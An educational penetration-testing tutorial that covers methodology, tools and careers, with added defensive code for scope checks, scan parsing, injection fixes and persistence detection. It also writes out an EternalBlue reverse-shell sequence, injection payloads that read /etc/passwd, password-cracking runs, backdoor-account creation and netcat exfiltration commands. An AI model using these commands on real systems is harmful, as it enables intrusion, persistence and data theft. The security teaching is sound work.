Introduction to Penetration Testing
What is Penetration Testing?
Penetration testing (pentesting) is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit. It's essentially "ethical hacking" - authorized attempts to breach systems to identify weaknesses before malicious actors do.
Types of Penetration Tests
By Knowledge Level
Black Box Testing
- No prior knowledge of the target
- Simulates external attacker
- Most realistic but time-consuming
- Example: Testing a public website
White Box Testing
- Full knowledge of the target
- Access to source code, architecture
- Most thorough testing
- Example: Internal security audit
Gray Box Testing
- Partial knowledge
- Simulates insider threat
- Balance between black-box and white-box testing
- Example: Testing with user credentials
By Target Type
Network Penetration Testing
- External network testing
- Internal network testing
- Wireless network testing
- Firewall/IDS testing
Web Application Testing
- OWASP Top 10 vulnerabilities
- Authentication/authorization
- Session management
- Input validation
Mobile Application Testing
- iOS/Android apps
- API security
- Data storage
- Communication security
Social Engineering
- Phishing campaigns
- Physical security testing
- Phone/email pretexting
- USB drop tests
Physical Penetration Testing
- Building access
- Lock picking
- Tailgating
- Dumpster diving
Penetration Testing Methodology
1. Planning and Reconnaissance
Scope Definition
- Define targets (IPs, domains, applications)
- Set boundaries (what's off-limits)
- Establish rules of engagement
- Get written authorization
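Scope is the one part of the engagement that should never depend on memory, so it is worth encoding the authorization letter as data and checking every candidate target against it before any command below runs. The following is an added example, not code from the original page: the `ALLOWED` and `EXCLUDED` lists are constructed sample values standing in for the ranges and domains named in a real scope agreement, and `in_scope` treats an exclusion as overriding an allowance, which is the safe default when the two overlap.

```python
"""Rules-of-engagement scope check (added example, not from the original page).

A target is in scope only if it is covered by an ALLOWED entry and not by
any EXCLUDED entry. Entries may be IPs, CIDR ranges or domain names; a
domain entry also covers its subdomains. Both lists below are constructed
sample values; replace them with the ones from your engagement letter.
"""
import ipaddress

# Constructed sample scope: what the written authorization covers...
ALLOWED = ["192.168.1.0/24", "10.0.5.10", "target.com"]
# ...and what is explicitly off-limits even though it falls inside ALLOWED
# (the gateway, a two-address production pair, and the mail host).
EXCLUDED = ["192.168.1.1", "192.168.1.250/31", "mail.target.com"]


def _matches(target: str, entry: str) -> bool:
    """True if `target` (IP address or hostname) is covered by one scope entry."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        # Hostname target: exact match, or a subdomain of a domain entry.
        t = target.lower().rstrip(".")
        e = entry.lower().rstrip(".")
        return t == e or t.endswith("." + e)
    try:
        net = ipaddress.ip_network(entry, strict=False)
    except ValueError:
        return False  # entry is a hostname and target is an IP: no match
    return addr in net


def in_scope(target: str, allowed=ALLOWED, excluded=EXCLUDED) -> bool:
    """Exclusions win over allowances, so an overlap never widens the scope."""
    if any(_matches(target, e) for e in excluded):
        return False
    return any(_matches(target, a) for a in allowed)


def filter_targets(targets, allowed=ALLOWED, excluded=EXCLUDED):
    """Split a candidate list into (in_scope, out_of_scope) for review."""
    ok, rejected = [], []
    for t in targets:
        (ok if in_scope(t, allowed, excluded) else rejected).append(t)
    return ok, rejected


if __name__ == "__main__":
    candidates = ["192.168.1.20", "192.168.1.1", "192.168.1.251",
                  "10.0.5.10", "10.0.5.11", "www.target.com",
                  "mail.target.com", "target.com.evil.example"]
    ok, rejected = filter_targets(candidates)
    print("in scope:     ", ok)
    print("out of scope: ", rejected)
```

Feeding the output of `filter_targets` to the scanner, and logging the rejected list, gives you both a guard rail and evidence for the report that nothing outside the agreed scope was touched.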
Information Gathering
```bash
whois target.com                       # registrant, registrar and name servers
dig target.com                         # DNS records
theHarvester -d target.com -b google   # emails, hosts and names from search results
nmap -sn 192.168.1.0/24                # host discovery only (ping sweep), no port scan
nmap -p- target.com                    # scan all 65535 TCP ports
```
2. Scanning and Enumeration
Port Scanning
```bash
nmap -T4 -F target.com                 # fast scan of the 100 most common ports
nmap -p- -sV -sC target.com            # all TCP ports, version detection, default scripts
nmap -sU --top-ports 100 target.com    # UDP scan of the 100 most common ports
```
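Scan output is only useful once it is in a form you can diff against what the asset owner expects to be listening, which is also how the "unnecessary services" finding later on the page gets evidenced. The following is an added example, not code from the original page: it assumes the scan was saved with nmap's `-oX` option (for instance `nmap -p- -sV -oX scan.xml target.com`), the XML below is a constructed sample in that format, and the `BASELINE` of expected ports is a constructed example of an owner-supplied service list.

```python
"""Parse nmap XML output into a port table and flag unexpected open ports.

Added example, not part of the original page. SAMPLE_XML is a constructed
document in the format nmap writes with -oX; BASELINE is a constructed
list of the ports the asset owner says should be exposed.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- -sV -oX scan.xml 192.168.1.20">
  <host>
    <status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <hostnames><hostname name="web01.target.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/>
        <service name="https"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed baseline: host -> ports that are supposed to be reachable.
BASELINE = {"192.168.1.20": {22, 80}}


def parse_nmap_xml(xml_text):
    """Return one dict per scanned port: host, hostname, port, proto, state, service, product."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue  # skip hosts without an IPv4 address element
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ""
        for port in host.iter("port"):
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            rows.append({
                "host": addr_el.get("addr"),
                "hostname": hostname,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": product,
            })
    return rows


def unexpected_open(rows, baseline):
    """Open ports not listed in the baseline for that host, sorted for the report."""
    out = []
    for r in rows:
        if r["state"] == "open" and r["port"] not in baseline.get(r["host"], set()):
            out.append((r["host"], r["port"], r["service"]))
    return sorted(out)


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_XML)
    for r in rows:
        print(f"{r['host']:<16}{r['port']:>6}/{r['proto']:<4}{r['state']:<8}{r['service']:<8}{r['product']}")
    print("unexpected open ports:", unexpected_open(rows, BASELINE))
```

The same parser works on a scan of a whole range, and the baseline comparison is what turns "3306/tcp open" into a finding with a clear owner and a clear remediation (close it or add it to the approved list).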
Service Enumeration
```bash
nikto -h http://target.com             # web server misconfigurations and known issues
dirb http://target.com                 # directory and file brute force
enum4linux target.com                  # SMB/Samba enumeration (users, shares, policies)
smbclient -L //target.com              # list SMB shares
snmpwalk -v2c -c public target.com     # SNMP walk using the default community string
dnsrecon -d target.com                 # DNS enumeration (records, zone transfer attempts)
fierce -dns target.com                 # DNS subdomain discovery
```
3. Vulnerability Assessment
Automated Scanning
```bash
nikto -h http://target.com
sqlmap -u "http://target.com/page?id=1"   # test the id parameter for SQL injection
```
Manual Testing
- Review scan results
- Verify findings and rule out false positives
- Test for logic flaws
- Check for misconfigurations
4. Exploitation
Metasploit Framework
```text
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit
```
Web Application Exploitation
```bash
# Automated SQL injection test of a POST login form, enumerating databases on success
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test" --dbs
```
Typical manual payloads (cross-site scripting, then two OS command injection variants):
```text
<script>alert('XSS')</script>
; ls -la
| cat /etc/passwd
```
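Each of these payloads works for the same reason: user input is pasted into a string that another interpreter (SQL, HTML, the shell) then parses. The following is an added example, not code from the original page, showing the vulnerable pattern beside its fix in Python. The users table, the `ping` feature and the SHA-256 hashing are constructed for the demo; the SQL part runs against an in-memory SQLite database, and the command part only builds the command line or argv list rather than executing anything.

```python
"""Vulnerable vs. hardened handling of the payloads above (added example,
not from the original page). Everything here is constructed for the demo.
"""
import hashlib
import html
import re
import sqlite3


# --- SQL injection: a login form like the sqlmap target above -------------
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    # Demo only: a real system stores a slow, salted hash (bcrypt/argon2), not SHA-256.
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct horse").hexdigest()))
    return conn


def login_unsafe(conn, user, password):
    """VULNERABLE: string formatting places user input inside the SQL text,
    so a username of  admin' --  comments out the password check."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    sql = f"SELECT 1 FROM users WHERE username = '{user}' AND password_hash = '{digest}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user, password):
    """Hardened: a parameterized query; the input is bound as data, never parsed as SQL."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT 1 FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (user, digest)).fetchone() is not None


# --- XSS: reflecting a value into an HTML page ----------------------------
def greet_unsafe(name):
    """VULNERABLE: raw interpolation, so <script> is rendered as markup."""
    return f"<p>Hello, {name}!</p>"


def greet_safe(name):
    """Hardened: escape for the HTML text context before interpolating."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# --- OS command injection: a 'ping this host' diagnostic ------------------
# Allow-list for a hostname or dotted IPv4 address (RFC 1123 label rules).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def is_valid_host(host):
    return HOSTNAME_RE.match(host) is not None


def ping_command_unsafe(host):
    """VULNERABLE: this string would be handed to os.system(), where ';' and '|'
    start a second command."""
    return f"ping -c 1 {host}"


def ping_command_safe(host):
    """Hardened: allow-list validation, then an argv list for
    subprocess.run(argv, shell=False) so no shell ever parses the value."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    conn = make_db()
    print("unsafe login with  admin' -- :", login_unsafe(conn, "admin' --", "x"))
    print("safe   login with  admin' -- :", login_safe(conn, "admin' --", "x"))
    print(greet_safe("<script>alert('XSS')</script>"))
    print(ping_command_safe("target.com"))
```

The fixes share one shape: keep data and code separate by using the interpreter's own binding or escaping mechanism (parameters, context-aware escaping, argv without a shell) and validate against an allow-list rather than trying to blacklist characters like `;` and `|`.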
Password Attacks
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com   # online: SSH login guessing
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt           # offline: wordlist attack on captured hashes
hashcat -m 0 -a 0 hashes.txt wordlist.txt                              # offline: -m 0 = MD5 hashes, -a 0 = straight wordlist
```
5. Post-Exploitation
Maintain Access
```bash
useradd -m -s /bin/bash backdoor                            # add a local account with a home directory
echo "backdoor:password" | chpasswd                         # set its password non-interactively
mkdir -p /home/user/.ssh
echo "ssh-rsa YOUR_KEY" >> /home/user/.ssh/authorized_keys   # append a key to an existing user's trusted keys
```
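Every one of those commands leaves a trace that a baseline comparison catches: a new line in `/etc/passwd`, a changed login shell, or an extra key in `authorized_keys`. The following is an added example, not code from the original page, that diffs a known-good snapshot against the current state. The passwd contents and key files are constructed samples (the key blobs are placeholders, not real keys); in practice the baseline comes from configuration management or a signed snapshot taken at build time.

```python
"""Detect the persistence changes shown above: new accounts, changed shells,
extra UID-0 users and added SSH keys (added example, not from the original
page). All file contents below are constructed samples.
"""

BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
"""

# Same host after the commands above, plus a service account given a login shell.
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
backdoor:x:1001:1001::/home/backdoor:/bin/bash
"""

# authorized_keys content per user; key blobs are constructed placeholders.
BASELINE_KEYS = {
    "user": "ssh-ed25519 AAAAC3EXAMPLEKEY1 user@laptop\n",
}
CURRENT_KEYS = {
    "user": "ssh-ed25519 AAAAC3EXAMPLEKEY1 user@laptop\n"
            "ssh-rsa AAAAB3EXAMPLEKEY2\n",
    "backdoor": "ssh-rsa AAAAB3EXAMPLEKEY3 x\n",
}


def parse_passwd(text):
    """Map username -> (uid, login shell) from /etc/passwd content."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; worth flagging on its own in a real audit
        accounts[fields[0]] = (int(fields[2]), fields[6])
    return accounts


def diff_passwd(baseline_text, current_text):
    """Added/removed accounts, shell changes, and any non-root UID 0 account."""
    base, cur = parse_passwd(baseline_text), parse_passwd(current_text)
    common = base.keys() & cur.keys()
    return {
        "added": sorted(set(cur) - set(base)),
        "removed": sorted(set(base) - set(cur)),
        "shell_changed": sorted((n, base[n][1], cur[n][1]) for n in common if base[n][1] != cur[n][1]),
        "extra_uid0": sorted(n for n, (uid, _) in cur.items() if uid == 0 and n != "root"),
    }


def parse_authorized_keys(text):
    """Set of 'type blob' pairs in an authorized_keys file; options and comments are ignored."""
    keys = set()
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Skip any leading options (e.g. from="...") until the key type token.
        for i, p in enumerate(parts):
            if p.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
                keys.add(f"{p} {parts[i + 1]}")
                break
    return keys


def diff_keys(baseline, current):
    """Keys present now that were not in the baseline, per user."""
    added = {}
    for user, text in current.items():
        new = parse_authorized_keys(text) - parse_authorized_keys(baseline.get(user, ""))
        if new:
            added[user] = sorted(new)
    return added


if __name__ == "__main__":
    print("passwd changes:", diff_passwd(BASELINE_PASSWD, CURRENT_PASSWD))
    print("new SSH keys:  ", diff_keys(BASELINE_KEYS, CURRENT_KEYS))
```

Comparing key blobs rather than whole lines matters because an attacker can change only the comment field; and a `/usr/sbin/nologin` to `/bin/bash` change on a service account is as much a persistence mechanism as a new user.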
Privilege Escalation
Linux
```bash
uname -a                          # kernel version
cat /etc/issue                    # distribution
sudo -l                           # commands this user may run with sudo
find / -perm -4000 2>/dev/null    # SUID binaries
```
Windows
```bat
:: OS version and patch level
systeminfo
:: privileges held by the current token
whoami /priv
:: local accounts
net user
:: members of the local Administrators group
net localgroup administrators
```
Lateral Movement
- Pass-the-hash
- Pass-the-ticket
- Token impersonation
- Remote execution
Data Exfiltration
```bash
tar czf - /sensitive/data | base64 > data.txt   # compress and encode for transfer
python3 -m http.server 8000                      # serve files over HTTP
nc -lvp 4444 > file.txt                          # receiver: listen and write to a file
nc target.com 4444 < file.txt                    # sender: push the file to the listener
```
6. Reporting
Executive Summary
- High-level overview
- Business impact
- Risk assessment
- Recommendations
Technical Details
- Vulnerabilities found
- Exploitation steps
- Proof of concept
- Remediation steps
Report Structure
- Cover page
- Table of contents
- Executive summary
- Methodology
- Findings (by severity)
- Detailed technical analysis
- Recommendations
- Appendices
Essential Tools
Reconnaissance
- Nmap: Network scanner
- Recon-ng: Reconnaissance framework
- TheHarvester: OSINT gathering
- Maltego: Visual link analysis
Vulnerability Scanning
- Nessus: Commercial scanner
- OpenVAS: Open-source scanner
- Nikto: Web server scanner
- WPScan: WordPress scanner
Exploitation
- Metasploit: Exploitation framework
- SQLMap: SQL injection
- BeEF: Browser exploitation
- Social Engineering Toolkit
Post-Exploitation
- Mimikatz: Credential extraction
- PowerSploit: PowerShell toolkit
- Empire: Post-exploitation framework
- BloodHound: Active Directory analysis
Password Cracking
- John the Ripper: Password cracker
- Hashcat: GPU-accelerated cracking
- Hydra: Network login cracker
- CeWL: Custom wordlist generator
Web Application Testing
- Burp Suite: Web proxy
- OWASP ZAP: Web scanner
- Nikto: Web server scanner
- WFuzz: Web fuzzer
Common Vulnerabilities
OWASP Top 10 (2021)
- Broken Access Control
- Cryptographic Failures
- Injection
- Insecure Design
- Security Misconfiguration
- Vulnerable and Outdated Components
- Identification and Authentication Failures
- Software and Data Integrity Failures
- Security Logging and Monitoring Failures
- Server-Side Request Forgery
Network Vulnerabilities
- Weak passwords
- Unpatched systems
- Misconfigured services
- Default credentials
- Unnecessary services
- Weak encryption
Legal and Ethical Considerations
Legal Requirements
- Written authorization: Always required
- Scope agreement: Clear boundaries
- Non-disclosure: Protect client data
- Compliance: Follow regulations (GDPR, HIPAA)
Ethical Guidelines
- Do no harm: Don't damage systems
- Respect privacy: Handle data responsibly
- Report honestly: Disclose all findings
- Professional conduct: Maintain standards
Certifications
- CEH: Certified Ethical Hacker
- OSCP: Offensive Security Certified Professional
- GPEN: GIAC Penetration Tester
- eJPT: eLearnSecurity Junior Penetration Tester
- PNPT: Practical Network Penetration Tester
Practice Platforms
Online Labs
- Hack The Box: Realistic pentesting labs
- TryHackMe: Guided learning paths
- PentesterLab: Web application security
- Hack The Box Academy: Structured courses
Vulnerable Applications
- DVWA: Damn Vulnerable Web Application
- WebGoat: OWASP training app
- Metasploitable: Vulnerable Linux VM
- OWASP Juice Shop: Modern web app
CTF Platforms
- CTFtime: CTF calendar and rankings
- PicoCTF: Beginner-friendly CTF
- OverTheWire: Wargames
- Root-Me: Challenges and CTFs
Best Practices
Before Testing
- Get written authorization
- Define clear scope
- Establish communication channels
- Prepare testing environment
- Backup important data
During Testing
- Document everything
- Take screenshots
- Save command outputs
- Note timestamps
- Track credentials found
After Testing
- Secure findings
- Write comprehensive report
- Present to stakeholders
- Assist with remediation
- Perform retest if needed
Building Your Lab
Hardware
- Dedicated machine or VM host
- 16GB+ RAM recommended
- 500GB+ storage
- Network isolation capability
Software
- Attacker: Parrot OS/Kali Linux
- Targets: Metasploitable, DVWA, Windows VMs
- Network: pfSense firewall
- Monitoring: Security Onion
Network Setup
```text
Internet
   |
[Router]
   |
[Switch]
   |
   +--- [Attacker VM]
   +--- [Target VMs]
   +--- [Monitoring]
```
Career Path
Entry Level
- Security Analyst
- Junior Penetration Tester
- SOC Analyst
Mid Level
- Penetration Tester
- Security Consultant
- Red Team Operator
Senior Level
- Senior Penetration Tester
- Security Architect
- Red Team Lead
Salary Ranges (USD)
- Entry: $60k-$80k
- Mid: $80k-$120k
- Senior: $120k-$180k+
Next Steps
- Practice on vulnerable VMs
- Complete online courses
- Participate in CTFs
- Build your home lab
- Get certified
- Join bug bounty programs
- Contribute to open source
- Network with professionals
Resources
- Books: "The Web Application Hacker's Handbook", "Penetration Testing" by Georgia Weidman
- Courses: Offensive Security, eLearnSecurity, Cybrary
- Communities: Reddit r/netsec, Discord servers, local meetups
- Blogs: PortSwigger, Offensive Security, Pentester Academy